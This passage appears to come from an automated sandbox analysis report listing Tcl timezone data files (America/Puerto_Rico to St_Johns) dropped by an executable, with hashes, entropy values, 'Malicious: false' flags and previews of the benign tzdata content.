Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Puerto_Rico) {. {-9223372036854775808 -15865 0 LMT}. {-2233035335 -14400 0 AST}. {-873057600 -10800 0 AWT}. {-769395600 -10800 1 APT}. {-765399600 -14400 0 AST}. {-757368000 -14400 0 AST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Rainy_River Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7840
Entropy (8bit):	3.75014960690837
Encrypted:	false
SSDEEP:	192:k+iBktTzZSJw5/9/yuvQ+hcrD57X0N41+IestuNEbYkzbXwDTIRqfhXbdXvDXpVS:k+iBmTzZSJw5/9/yuvQ6crD57X0N41+a
MD5:	9C10496730E961187C33C1AE91C8A60D
SHA1:	A77E3508859FB6F76A7445CD13CD42348CB4EBC7
SHA-256:	136F0A49742F30B05B7C6BF3BF014CC999104F4957715D0BEB39F5440D5216DF
SHA-512:	70936E65D0B439F6BE6E31E27032F10BA2EB54672647DA615744ABC7A767F197F0C7FDBCCEE0D335CBCECB6855B7BD899D1A5B97BA5083FFA42AF5F30343EA7F
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Rainy_River) {. {-9223372036854775808 -22696 0 LMT}. {-2366732504 -21600 0 CST}. {-1632067200 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-923248800 -18000 1 CDT}. {-880214400 -18000 0 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {136368000 -18000 1 CDT}. {152089200 -21600 0 CST}. {167817600 -18000 1 CDT}. {183538800 -21600 0 CST}. {199267200 -18000 1 CDT}. {215593200 -21600 0 CST}. {230716800 -18000 1 CDT}. {247042800 -21600 0 CST}. {262771200 -18000 1 CDT}. {278492400 -21600 0 CST}. {294220800 -18000 1 CDT}. {309942000 -21600 0 CST}. {325670400 -18000 1 CDT}. {341391600 -21600 0 CST}. {357120000 -18000 1 CDT}. {372841200 -21600 0 CST}. {388569600 -18000 1 CDT}. {404895600 -21600 0 CST}. {420019200 -18000 1 CDT}. {436345200 -21600 0 CST}. {452073600 -18000 1 CDT}. {467794800 -21600 0 CST}. {483523200 -18000 1 CDT}.

C:\Users\user\Desktop\tcl\tzdata\America\Rankin_Inlet Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7366
Entropy (8bit):	3.753795978502298
Encrypted:	false
SSDEEP:	192:4w5/9/yuvQ+hcrD57X0N41+IstuNEbYkzbXwDTIRqfhXbdXvDXpVXVto//q7u37N:4w5/9/yuvQ6crD57X0N41+IstuNEbYkJ
MD5:	318E1221CBB525E852AD4154E30C9D72
SHA1:	5D107C7B01407B4716191C9BEB02017471FB2A4D
SHA-256:	FB37D25FD4860EB4AC1596F86B3B6DC7B6EDA9886C71327F91D39F5FAD64FC49
SHA-512:	77D345CA0006D391DD2F0A54075F692A34B37E99F9943C081885A745D7E0F1F6B9FC0F24AA6196A8458926CD7AD97C2B233F62FCEA11EDC80A35126B74A3C35A
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Rankin_Inlet) {. {-9223372036854775808 0 0 zzz}. {-410227200 -21600 0 CST}. {-147895200 -14400 1 CDDT}. {-131565600 -21600 0 CST}. {325670400 -18000 1 CDT}. {341391600 -21600 0 CST}. {357120000 -18000 1 CDT}. {372841200 -21600 0 CST}. {388569600 -18000 1 CDT}. {404895600 -21600 0 CST}. {420019200 -18000 1 CDT}. {436345200 -21600 0 CST}. {452073600 -18000 1 CDT}. {467794800 -21600 0 CST}. {483523200 -18000 1 CDT}. {499244400 -21600 0 CST}. {514972800 -18000 1 CDT}. {530694000 -21600 0 CST}. {544608000 -18000 1 CDT}. {562143600 -21600 0 CST}. {576057600 -18000 1 CDT}. {594198000 -21600 0 CST}. {607507200 -18000 1 CDT}. {625647600 -21600 0 CST}. {638956800 -18000 1 CDT}. {657097200 -21600 0 CST}. {671011200 -18000 1 CDT}. {688546800 -21600 0 CST}. {702460800 -18000 1 CDT}. {719996400 -21600 0 CST}. {733910400 -18000 1 CDT}. {75205

C:\Users\user\Desktop\tcl\tzdata\America\Recife Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1391
Entropy (8bit):	3.990359910189371
Encrypted:	false
SSDEEP:	24:cQHJeHAqc+Ih+j+Dd+HO+W+iW+M+A+ph+h/1+ge5+Wt+x3+evIG+M+w+w+jZ+SIW:5KAP+Ih+j+R+u+W+iW+M+A+r+hN+gU+q
MD5:	B4D04123688878D611AD09955F51B358
SHA1:	6E0946E726378F5CC9C2BE1F73A2E56166A9039B
SHA-256:	D003E821BA76CE33468AFED3AE5AFD3C85A45E88B4B82CF46E2AFCD0D3334B5A
SHA-512:	2DC6A31093E161EDAB607E04EA943D6F79A43D9B427A402506A8A2933BC891806D0919842DC25A5ECC6EF7BB90E469556EE5FD428A8AE334A6E4EC0D6C426D41
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Recife) {. {-9223372036854775808 -8376 0 LMT}. {-1767217224 -10800 0 BRT}. {-1206957600 -7200 1 BRST}. {-1191362400 -10800 0 BRT}. {-1175374800 -7200 1 BRST}. {-1159826400 -10800 0 BRT}. {-633819600 -7200 1 BRST}. {-622069200 -10800 0 BRT}. {-602283600 -7200 1 BRST}. {-591832800 -10800 0 BRT}. {-570747600 -7200 1 BRST}. {-560210400 -10800 0 BRT}. {-539125200 -7200 1 BRST}. {-531352800 -10800 0 BRT}. {-191365200 -7200 1 BRST}. {-184197600 -10800 0 BRT}. {-155163600 -7200 1 BRST}. {-150069600 -10800 0 BRT}. {-128898000 -7200 1 BRST}. {-121125600 -10800 0 BRT}. {-99954000 -7200 1 BRST}. {-89589600 -10800 0 BRT}. {-68418000 -7200 1 BRST}. {-57967200 -10800 0 BRT}. {499748400 -7200 1 BRST}. {511236000 -10800 0 BRT}. {530593200 -7200 1 BRST}. {540266400 -10800 0 BRT}. {562129200 -7200 1 BRST}. {571197600 -10800 0 BRT}. {592974000 -7200

C:\Users\user\Desktop\tcl\tzdata\America\Regina Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1723
Entropy (8bit):	3.956012642028802
Encrypted:	false
SSDEEP:	48:56ecDOBDgE+hIZVEa3lGw+6yZgTX+rNO46wYDW:86VlGS8
MD5:	7D955B277C43D51F19377A91B987FAF9
SHA1:	F2F3E11E955C3E58E21654F3D841B5B1528C0913
SHA-256:	A1FA7BF002B3BA8DCA4D52AA0BB41C047DDAF88B2E542E1FCF81CB3AAF91AA75
SHA-512:	719DEE7A932EDB9255D711E82AC0CA3FCFB07AF3EFE2EE0D887D7137F6059BEBE07F85D910CC0005391D244B4EADA16257BE49787938386FD4B5DB6D8E31D513
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Regina) {. {-9223372036854775808 -25116 0 LMT}. {-2030202084 -25200 0 MST}. {-1632063600 -21600 1 MDT}. {-1615132800 -25200 0 MST}. {-1251651600 -21600 1 MDT}. {-1238349600 -25200 0 MST}. {-1220202000 -21600 1 MDT}. {-1206900000 -25200 0 MST}. {-1188752400 -21600 1 MDT}. {-1175450400 -25200 0 MST}. {-1156698000 -21600 1 MDT}. {-1144000800 -25200 0 MST}. {-1125248400 -21600 1 MDT}. {-1111946400 -25200 0 MST}. {-1032714000 -21600 1 MDT}. {-1016992800 -25200 0 MST}. {-1001264400 -21600 1 MDT}. {-986148000 -25200 0 MST}. {-969814800 -21600 1 MDT}. {-954093600 -25200 0 MST}. {-937760400 -21600 1 MDT}. {-922039200 -25200 0 MST}. {-906310800 -21600 1 MDT}. {-890589600 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-748450800 -21600 1 MDT}. {-732729600 -25200 0 MST}. {-715791600 -21600 1 MDT}

C:\Users\user\Desktop\tcl\tzdata\America\Resolute Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7362
Entropy (8bit):	3.7499369602687835
Encrypted:	false
SSDEEP:	192:tw5/9/yuvQ+hcrD57X0N41+IstuNESkzbXwDTIRqfhXbdXvDXpVXVto//q7u379L:tw5/9/yuvQ6crD57X0N41+IstuNESkzV
MD5:	224BE093D948CE13FD07C5E52D0D79D0
SHA1:	DEE0C0BB79F8D31CB023A3CA665B488A2C906BD5
SHA-256:	BF3DA96E2199A2C8683F5BF4AB1501090977C913F396804983C12DEB4DEEDD29
SHA-512:	622CFD5BE51DEE1DFDFFD909C4662D987F39C4556E9777F69A3538D920C1977FC05478C2D2DCD21BF9413D3D1FE7B5E218479CA36BBB70DD1F9CC8D4168602AF
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Resolute) {. {-9223372036854775808 0 0 zzz}. {-704937600 -21600 0 CST}. {-147895200 -14400 1 CDDT}. {-131565600 -21600 0 CST}. {325670400 -18000 1 CDT}. {341391600 -21600 0 CST}. {357120000 -18000 1 CDT}. {372841200 -21600 0 CST}. {388569600 -18000 1 CDT}. {404895600 -21600 0 CST}. {420019200 -18000 1 CDT}. {436345200 -21600 0 CST}. {452073600 -18000 1 CDT}. {467794800 -21600 0 CST}. {483523200 -18000 1 CDT}. {499244400 -21600 0 CST}. {514972800 -18000 1 CDT}. {530694000 -21600 0 CST}. {544608000 -18000 1 CDT}. {562143600 -21600 0 CST}. {576057600 -18000 1 CDT}. {594198000 -21600 0 CST}. {607507200 -18000 1 CDT}. {625647600 -21600 0 CST}. {638956800 -18000 1 CDT}. {657097200 -21600 0 CST}. {671011200 -18000 1 CDT}. {688546800 -21600 0 CST}. {702460800 -18000 1 CDT}. {719996400 -21600 0 CST}. {733910400 -18000 1 CDT}. {752050800

C:\Users\user\Desktop\tcl\tzdata\America\Rio_Branco Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1059
Entropy (8bit):	4.058394079269598
Encrypted:	false
SSDEEP:	24:cQYEeH5uwss/uS+L/ux+y/up+a/uj+Ne/ud+Rs/uX4+G/u43+a/uo8+h/u1F+E/h:5q5ZsQt8uqwd4rghFGRhGj+tX1sB
MD5:	0A85ED0235E490A6679786ACEAC08572
SHA1:	2C57ECFBB1B65788FE986501434A1874F25F8DFA
SHA-256:	1AEC2AE3C237CBCE849EFD51EEA54F40018ED33068951969B92EAAFD31E7191C
SHA-512:	191670630E96C390DB61CFAE3B50890E35F57FC60273F23B365EF5D873EFC9160BD1A57D003F8048B545E2436220A08C44F838AB92CCA2DB43891C943CB94CDE
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Rio_Branco) {. {-9223372036854775808 -16272 0 LMT}. {-1767209328 -18000 0 ACT}. {-1206950400 -14400 1 ACST}. {-1191355200 -18000 0 ACT}. {-1175367600 -14400 1 ACST}. {-1159819200 -18000 0 ACT}. {-633812400 -14400 1 ACST}. {-622062000 -18000 0 ACT}. {-602276400 -14400 1 ACST}. {-591825600 -18000 0 ACT}. {-570740400 -14400 1 ACST}. {-560203200 -18000 0 ACT}. {-539118000 -14400 1 ACST}. {-531345600 -18000 0 ACT}. {-191358000 -14400 1 ACST}. {-184190400 -18000 0 ACT}. {-155156400 -14400 1 ACST}. {-150062400 -18000 0 ACT}. {-128890800 -14400 1 ACST}. {-121118400 -18000 0 ACT}. {-99946800 -14400 1 ACST}. {-89582400 -18000 0 ACT}. {-68410800 -14400 1 ACST}. {-57960000 -18000 0 ACT}. {499755600 -14400 1 ACST}. {511243200 -18000 0 ACT}. {530600400 -14400 1 ACST}. {540273600 -18000 0 ACT}. {562136400 -14400 1 ACST}. {571204800 -18000 0 ACT}.

C:\Users\user\Desktop\tcl\tzdata\America\Rosario Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	214
Entropy (8bit):	4.752946571641783
Encrypted:	false
SSDEEP:	6:SlSWB9IZaM3y7/MdVAIgp/MOF290rI5290/Msn:MBaIMY/M4p/MOF290r190/Ms
MD5:	4FC460A084DF33A73F2F87B7962B0084
SHA1:	45E70D5D68FC2DE0ACFF76B062ADA17E0021460F
SHA-256:	D1F5FFD2574A009474230E0AA764256B039B1D78D91A1CB944B21776377B5B70
SHA-512:	40045420FE88FA54DE4A656534C0A51357FBAB3EA3B9120DA15526A9DEC7EEC2C9799F4D9A72B6050474AD67490BC28540FDA0F17B7FCAF125D41CBCA96ECCDE
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Argentina/Cordoba)]} {. LoadTimeZoneFile America/Argentina/Cordoba.}.set TZData(:America/Rosario) $TZData(:America/Argentina/Cordoba).

C:\Users\user\Desktop\tcl\tzdata\America\Santa_Isabel Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8445
Entropy (8bit):	3.7709584779896055
Encrypted:	false
SSDEEP:	96:Sb4I5mC2ZCAFrAdjyuqd3SHdbV2zSd61u/XZ9ma3mL9:25DarAdjyuqg9bV2x1uCp
MD5:	DCF171E7C58C232BF1F477BD038D15B8
SHA1:	0C3FFF0FDC52537C406EF2598FCBFD26831D69A7
SHA-256:	D1F9859973D8B4E98F57D097F12C32DA9A9CFF6E91F71A7355F41C22BADA6F58
SHA-512:	7370B5D5C199525CD000CEDFE58BCDD8DB8FD5E34CD923E622B6917FC1328DA53653D9B904A5F70371704BEFDB6335BA32C83869857D95CFA78620D54B9A140D
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Santa_Isabel) {. {-9223372036854775808 -27568 0 LMT}. {-1514736000 -25200 0 MST}. {-1451667600 -28800 0 PST}. {-1343062800 -25200 0 MST}. {-1234803600 -28800 0 PST}. {-1222963200 -25200 1 PDT}. {-1207242000 -28800 0 PST}. {-873820800 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-761677200 -28800 0 PST}. {-686073600 -25200 1 PDT}. {-661539600 -28800 0 PST}. {-504892800 -28800 0 PST}. {-495036000 -25200 1 PDT}. {-481734000 -28800 0 PST}. {-463586400 -25200 1 PDT}. {-450284400 -28800 0 PST}. {-431532000 -25200 1 PDT}. {-418230000 -28800 0 PST}. {-400082400 -25200 1 PDT}. {-386780400 -28800 0 PST}. {-368632800 -25200 1 PDT}. {-355330800 -28800 0 PST}. {-337183200 -25200 1 PDT}. {-323881200 -28800 0 PST}. {-305733600 -25200 1 PDT}. {-292431600 -28800 0 PST}. {-283968000 -28800 0 PST}. {189331200 -28800 0 PST}. {199274400 -25200 1 PDT}. {

C:\Users\user\Desktop\tcl\tzdata\America\Santarem Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1057
Entropy (8bit):	4.04156999168428
Encrypted:	false
SSDEEP:	24:cQceUho6Skl7s/oySklTs/oiSklP/otHSkl8/oNOSkll/osSklGo/ooSklR/o9S8:5v6SklVySklTpiSklo5Skl5oSklOsSk8
MD5:	16E6B322ADE028816D19A348B1E9D901
SHA1:	108A88CBE875DBAD31F8AA7611AEC99BF37A6554
SHA-256:	39DF7B763BDB6153DD5916DCE4D220F9A911FCAEBC1FC617C5FF632BD83B2041
SHA-512:	20DA68089C4418E1EFFE987DB5EB6EBA6F82271C236AF1FCBFFAD5450BB2C03CC3D77CA7696965C841EE6B0DE1656FBF8350EBF6A660975B90B87D33841EF78D
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Santarem) {. {-9223372036854775808 -13128 0 LMT}. {-1767212472 -14400 0 AMT}. {-1206954000 -10800 1 AMST}. {-1191358800 -14400 0 AMT}. {-1175371200 -10800 1 AMST}. {-1159822800 -14400 0 AMT}. {-633816000 -10800 1 AMST}. {-622065600 -14400 0 AMT}. {-602280000 -10800 1 AMST}. {-591829200 -14400 0 AMT}. {-570744000 -10800 1 AMST}. {-560206800 -14400 0 AMT}. {-539121600 -10800 1 AMST}. {-531349200 -14400 0 AMT}. {-191361600 -10800 1 AMST}. {-184194000 -14400 0 AMT}. {-155160000 -10800 1 AMST}. {-150066000 -14400 0 AMT}. {-128894400 -10800 1 AMST}. {-121122000 -14400 0 AMT}. {-99950400 -10800 1 AMST}. {-89586000 -14400 0 AMT}. {-68414400 -10800 1 AMST}. {-57963600 -14400 0 AMT}. {499752000 -10800 1 AMST}. {511239600 -14400 0 AMT}. {530596800 -10800 1 AMST}. {540270000 -14400 0 AMT}. {562132800 -10800 1 AMST}. {571201200 -14400 0 AMT}.

C:\Users\user\Desktop\tcl\tzdata\America\Santiago Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8782
Entropy (8bit):	3.771877030948939
Encrypted:	false
SSDEEP:	192:LZAAD/BUZrHljtDqM5rgV7ugM981gh+tLIzx6z31ho1VmTfE3rZZ1LqdkG7xd28g:L+IwxUpf2RsU
MD5:	DAB25ED0D5E9949009CFA399936EFF47
SHA1:	3C8FAA3E974AB0644F908855E98755D56EFD86B4
SHA-256:	E1D5723779CFB015216AF4F392BE99E256D495BF4121CC404F616CF9C8AED081
SHA-512:	91F3A315E88284307C97D10A0888BB154303C319D18592A007C3820E6C3E86E4F50C7868042A7AF593D77C34C7DE4FAFFCF54ED00075188305DC7D6ADB3CB767
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Santiago) {. {-9223372036854775808 -16966 0 LMT}. {-2524504634 -16966 0 SMT}. {-1893439034 -18000 0 CLT}. {-1688410800 -16966 0 SMT}. {-1619983034 -14400 0 CLT}. {-1593806400 -16966 0 SMT}. {-1335986234 -18000 0 CLT}. {-1335985200 -14400 1 CLST}. {-1317585600 -18000 0 CLT}. {-1304362800 -14400 1 CLST}. {-1286049600 -18000 0 CLT}. {-1272826800 -14400 1 CLST}. {-1254513600 -18000 0 CLT}. {-1241290800 -14400 1 CLST}. {-1222977600 -18000 0 CLT}. {-1209754800 -14400 1 CLST}. {-1191355200 -18000 0 CLT}. {-1178132400 -14400 1 CLST}. {-870552000 -18000 0 CLT}. {-865278000 -14400 1 CLST}. {-740520000 -14400 1 CLST}. {-736376400 -18000 0 CLT}. {-718056000 -18000 0 CLT}. {-713646000 -14400 0 CLT}. {-36619200 -10800 1 CLST}. {-23922000 -14400 0 CLT}. {-3355200 -10800 1 CLST}. {7527600 -14400 0 CLT}. {24465600 -10800 1 CLST}. {37767600 -14400 0 C

C:\Users\user\Desktop\tcl\tzdata\America\Santo_Domingo Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	590
Entropy (8bit):	4.346772162962135
Encrypted:	false
SSDEEP:	12:MBp5290/SyJmdHhvPu4/G/uFNM/KMVv5/+MVvYx/r0XVvpUB/B7Vvo6I8/05aVvH:cQ+DJeVu4e/uICE5FYxwdpUBZpo65VAO
MD5:	EE407C833EB0E28801B27356ABA678E3
SHA1:	DD22E7B4FFA07B7A97804E92DA3CD8772C2D7507
SHA-256:	72347F7D89EC3D7025FCC3AA0DDA2D594F11BAA12EF2AB55F1677AC4DD5AFE88
SHA-512:	3DDD1C02AB0BC3005B9CD4F58F6349D7001D55F78A51E9D363D98B23B11C78B631B81DAC762E9F18352C2DB612C05E855BB1C0156A148E720C848EBABF48371B
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Santo_Domingo) {. {-9223372036854775808 -16776 0 LMT}. {-2524504824 -16800 0 SDMT}. {-1159773600 -18000 0 EST}. {-100119600 -14400 1 EDT}. {-89668800 -18000 0 EST}. {-5770800 -16200 1 EHDT}. {4422600 -18000 0 EST}. {25678800 -16200 1 EHDT}. {33193800 -18000 0 EST}. {57733200 -16200 1 EHDT}. {64816200 -18000 0 EST}. {89182800 -16200 1 EHDT}. {96438600 -18000 0 EST}. {120632400 -16200 1 EHDT}. {127974600 -18000 0 EST}. {152082000 -14400 0 AST}. {975823200 -14400 0 AST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Sao_Paulo Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7678
Entropy (8bit):	3.782328041884024
Encrypted:	false
SSDEEP:	192:LdP+2+j+R+u+W+B5+M+A+r+L+v+8+h+2+M+Y+v+c+M+++v+8+/+C+jZ+E+2+A++q:LGWbb8B4
MD5:	B9596E3584EBAFEA5D0257129A03F06D
SHA1:	6FD25D7D4D7A5320D981FF001AAB57EFDB852313
SHA-256:	FA6B2AF6815C1BA6751F0807FEAB49E5E60B4C774A45A96EC6EC3563DA358463
SHA-512:	215BEACD30BC54F416C74A98B597E5B1EEDE627121BF58A12F829E55F921FD3EF9C1C6FF0F639D1929882BC0E7380E73038AA6BFD49E6E7BF28A7711802F4212
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Sao_Paulo) {. {-9223372036854775808 -11188 0 LMT}. {-1767214412 -10800 0 BRT}. {-1206957600 -7200 1 BRST}. {-1191362400 -10800 0 BRT}. {-1175374800 -7200 1 BRST}. {-1159826400 -10800 0 BRT}. {-633819600 -7200 1 BRST}. {-622069200 -10800 0 BRT}. {-602283600 -7200 1 BRST}. {-591832800 -10800 0 BRT}. {-570747600 -7200 1 BRST}. {-560210400 -10800 0 BRT}. {-539125200 -7200 1 BRST}. {-531352800 -10800 0 BRT}. {-195429600 -7200 1 BRST}. {-189381600 -7200 0 BRT}. {-184197600 -10800 0 BRT}. {-155163600 -7200 1 BRST}. {-150069600 -10800 0 BRT}. {-128898000 -7200 1 BRST}. {-121125600 -10800 0 BRT}. {-99954000 -7200 1 BRST}. {-89589600 -10800 0 BRT}. {-68418000 -7200 1 BRST}. {-57967200 -10800 0 BRT}. {499748400 -7200 1 BRST}. {511236000 -10800 0 BRT}. {530593200 -7200 1 BRST}. {540266400 -10800 0 BRT}. {562129200 -7200 1 BRST}. {571197600 -1

C:\Users\user\Desktop\tcl\tzdata\America\Scoresbysund Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6713
Entropy (8bit):	3.7831757008437528
Encrypted:	false
SSDEEP:	96:P0pq6GNOHfSPRayJvZbzmgyb9qqv95aZIhlVeDEzm:EqBOHfSPRayHbNyb9FHzm
MD5:	29C14A9AFA37EFB29DF4424EB905D3FA
SHA1:	35C7F008987D19925D2BC8C06F31B2F1B323478E
SHA-256:	424C05FE8CE2EB094A0840C97286EC3E32B03B73AE92BC34F68E4E986041615E
SHA-512:	A5F933CD082BD6D09DAF64D2245EA043D2A11A3E0E3373D3877CD4AAF4D6BB5BF9C62771C16AF097B1C9E34CF035F95967537ECD2521B9D074C3C33A43559E93
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Scoresbysund) {. {-9223372036854775808 -5272 0 LMT}. {-1686090728 -7200 0 CGT}. {323841600 -3600 0 CGST}. {338961600 -7200 0 CGT}. {354679200 0 0 EGST}. {370400400 -3600 0 EGT}. {386125200 0 1 EGST}. {401850000 -3600 0 EGT}. {417574800 0 1 EGST}. {433299600 -3600 0 EGT}. {449024400 0 1 EGST}. {465354000 -3600 0 EGT}. {481078800 0 1 EGST}. {496803600 -3600 0 EGT}. {512528400 0 1 EGST}. {528253200 -3600 0 EGT}. {543978000 0 1 EGST}. {559702800 -3600 0 EGT}. {575427600 0 1 EGST}. {591152400 -3600 0 EGT}. {606877200 0 1 EGST}. {622602000 -3600 0 EGT}. {638326800 0 1 EGST}. {654656400 -3600 0 EGT}. {670381200 0 1 EGST}. {686106000 -3600 0 EGT}. {701830800 0 1 EGST}. {717555600 -3600 0 EGT}. {733280400 0 1 EGST}. {749005200 -3600 0 EGT}. {764730000 0 1 EGST}. {780454800 -3600 0 EGT}. {796179600 0 1 EGST}. {811904400 -3600 0 EGT

C:\Users\user\Desktop\tcl\tzdata\America\Shiprock Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	182
Entropy (8bit):	4.840231755053259
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx06RGFwVAIg206RAO0L2IAcGEtOFBx+IAcGE6Ru:SlSWB9IZaM3y7+SwVAIgp+iL290tO09G
MD5:	65307038DB12A7A447284DF4F3E6A3E8
SHA1:	DC28D6863986D7A158CEF239D46BE9F5033DF897
SHA-256:	3FD862C9DB2D5941DFDBA5622CC53487A7FC5039F7012B78D3EE4B58753D078D
SHA-512:	91BC29B7EC9C49D4020DC26F682D0EFBBBEE83D10D79C766A08C78D5FF04D9C0A09288D9696A378E777B65E0C2C2AC8A218C12F86C45BD6E7B5E204AE5FC2335
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Denver)]} {. LoadTimeZoneFile America/Denver.}.set TZData(:America/Shiprock) $TZData(:America/Denver).

C:\Users\user\Desktop\tcl\tzdata\America\Sitka Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8376
Entropy (8bit):	3.8797731776796454
Encrypted:	false
SSDEEP:	96:6G19jJps/Q7Ddh5sBPyNsSLFOMM/EowALVZVmWa86Eac8rQ:6M9jI/4h5sBPy+CMt/ElALLVuAH
MD5:	6A3014865B6330673B4F71C1617C486B
SHA1:	52334201654D421DD97D62D0C12065308E6A9D56
SHA-256:	92C6A715A1994EC61D8879A763EEF2B06FFC15876306DD6262ABBD5D3DA23CE0
SHA-512:	B957F258BDBDDA043AF2FE8D66AE6247998A7CE398A56C641FF4DEA8F70BB63652D8B223F783E82B18570E28AB11E76CB1DA2BE6648F449F9F4D745987E109D4
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Sitka) {. {-9223372036854775808 53927 0 LMT}. {-3225365927 -32473 0 LMT}. {-2188954727 -28800 0 PST}. {-883584000 -28800 0 PST}. {-880207200 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-765385200 -28800 0 PST}. {-757353600 -28800 0 PST}. {-31507200 -28800 0 PST}. {-21477600 -25200 1 PDT}. {-5756400 -28800 0 PST}. {9972000 -25200 1 PDT}. {25693200 -28800 0 PST}. {41421600 -25200 1 PDT}. {57747600 -28800 0 PST}. {73476000 -25200 1 PDT}. {89197200 -28800 0 PST}. {104925600 -25200 1 PDT}. {120646800 -28800 0 PST}. {126698400 -25200 1 PDT}. {152096400 -28800 0 PST}. {162381600 -25200 1 PDT}. {183546000 -28800 0 PST}. {199274400 -25200 1 PDT}. {215600400 -28800 0 PST}. {230724000 -25200 1 PDT}. {247050000 -28800 0 PST}. {262778400 -25200 1 PDT}. {278499600 -28800 0 PST}. {294228000 -25200 1 PDT}. {309949200 -28800 0 PST}. {325677600 -

C:\Users\user\Desktop\tcl\tzdata\America\St_Barthelemy Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	199
Entropy (8bit):	4.8867149194613955
Encrypted:	false
SSDEEP:	6:SlSWB9IZaM3y75AJL4DvFVAIgp5AJ3L290txP905AJLv:MBaIMYqJL40pqJ3L2907P90qJLv
MD5:	6E608C0B4256146ED9FB7DC19F9A19CE
SHA1:	A80F65F087BD57EF199156FE9D9A6FC241C543E2
SHA-256:	CD86D6B4A31A5C965966342F08DF8EA81A1F34BFFEBA4F187D4976375F58D08C
SHA-512:	FB9F52B821853EACD7FE4DCEEA655A859937F7DCAE1C588092C9D44FC94360DE7893854A6A7901C6C6FA096A8EB316A8C423C6A16B205B76E63D61D3AF3E4D3A
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Guadeloupe)]} {. LoadTimeZoneFile America/Guadeloupe.}.set TZData(:America/St_Barthelemy) $TZData(:America/Guadeloupe).

C:\Users\user\Desktop\tcl\tzdata\America\St_Johns Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10917
Entropy (8bit):	3.7872036312069963
Encrypted:	false
SSDEEP:	192:Vvprjhbvd8mSGu9EnkBVAZK2GrbrvZeuqpNFT:Vvbvd7SGu9lzoVpDT
MD5:	F87531D6DC9AAFB2B0F79248C5ADA772
SHA1:	E14C52B0F564FA3A3536B7576A2B27D4738CA76B
SHA-256:	0439DA60D4C52F0E777431BF853D366E2B5D89275505201080954D88F6CA9478
SHA-512:	5B43CE25D970EEEFD09865D89137388BD879C599191DE8ACE37DA657C142B6DF63143DBF9DED7659CBD5E45BAB699E2A3AFDD28C76A7CB2F300EBD9B74CDA59D
Malicious:	false
